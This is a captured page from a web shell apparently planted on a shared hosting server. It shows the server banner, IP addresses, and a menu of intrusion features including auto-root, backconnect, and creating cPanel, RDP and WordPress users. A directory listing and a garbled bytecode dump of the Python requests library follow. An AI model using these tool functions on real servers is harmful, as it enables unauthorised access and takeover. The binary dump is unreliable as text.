Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.6 /
site-packages /
requests /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-36.opt-1.pyc
2.92
KB
-rw-r--r--
__init__.cpython-36.pyc
3.04
KB
-rw-r--r--
__version__.cpython-36.opt-1.p...
471
B
-rw-r--r--
__version__.cpython-36.pyc
471
B
-rw-r--r--
_internal_utils.cpython-36.opt...
1.16
KB
-rw-r--r--
_internal_utils.cpython-36.pyc
1.2
KB
-rw-r--r--
adapters.cpython-36.opt-1.pyc
21.96
KB
-rw-r--r--
adapters.cpython-36.pyc
21.96
KB
-rw-r--r--
api.cpython-36.opt-1.pyc
6.26
KB
-rw-r--r--
api.cpython-36.pyc
6.26
KB
-rw-r--r--
auth.cpython-36.opt-1.pyc
8.07
KB
-rw-r--r--
auth.cpython-36.pyc
8.07
KB
-rw-r--r--
certs.cpython-36.opt-1.pyc
875
B
-rw-r--r--
certs.cpython-36.pyc
875
B
-rw-r--r--
compat.cpython-36.opt-1.pyc
1.54
KB
-rw-r--r--
compat.cpython-36.pyc
1.54
KB
-rw-r--r--
cookies.cpython-36.opt-1.pyc
18.27
KB
-rw-r--r--
cookies.cpython-36.pyc
18.27
KB
-rw-r--r--
exceptions.cpython-36.opt-1.py...
5.29
KB
-rw-r--r--
exceptions.cpython-36.pyc
5.29
KB
-rw-r--r--
help.cpython-36.opt-1.pyc
2.49
KB
-rw-r--r--
help.cpython-36.pyc
2.49
KB
-rw-r--r--
hooks.cpython-36.opt-1.pyc
901
B
-rw-r--r--
hooks.cpython-36.pyc
901
B
-rw-r--r--
models.cpython-36.opt-1.pyc
23.45
KB
-rw-r--r--
models.cpython-36.pyc
23.45
KB
-rw-r--r--
packages.cpython-36.opt-1.pyc
353
B
-rw-r--r--
packages.cpython-36.pyc
353
B
-rw-r--r--
sessions.cpython-36.opt-1.pyc
18.92
KB
-rw-r--r--
sessions.cpython-36.pyc
18.92
KB
-rw-r--r--
status_codes.cpython-36.opt-1....
4.59
KB
-rw-r--r--
status_codes.cpython-36.pyc
4.59
KB
-rw-r--r--
structures.cpython-36.opt-1.py...
4.2
KB
-rw-r--r--
structures.cpython-36.pyc
4.2
KB
-rw-r--r--
utils.cpython-36.opt-1.pyc
21.55
KB
-rw-r--r--
utils.cpython-36.pyc
21.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.cpython-36.pyc
3 ��[m � @ s\ d Z ddlmZ dd� Zddd�Zdd � Zd d� Zddd �Zddd�Zddd�Z dd� Z dS )z� requests.api ~~~~~~~~~~~~ This module implements the Requests API. :copyright: (c) 2012 by Kenneth Reitz. :license: Apache2, see LICENSE for more details. � )�sessionsc K s* t j� �}|jf | |d�|��S Q R X dS )a� Constructs and sends a :class:`Request <Request>`. :param method: method for the new :class:`Request` object. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary, list of tuples or bytes to send in the body of the :class:`Request`. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', fileobj, 'content_type')`` or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content-type'`` is a string defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers to add for the file. :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How many seconds to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. Defaults to ``True``. :param stream: (optional) if ``False``, the response content will be immediately downloaded. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. :return: :class:`Response <Response>` object :rtype: requests.Response Usage:: >>> import requests >>> req = requests.request('GET', 'https://httpbin.org/get') <Response [200]> )�method�urlN)r ZSession�request)r r �kwargsZsession� r �/usr/lib/python3.6/api.pyr s + r Nc K s"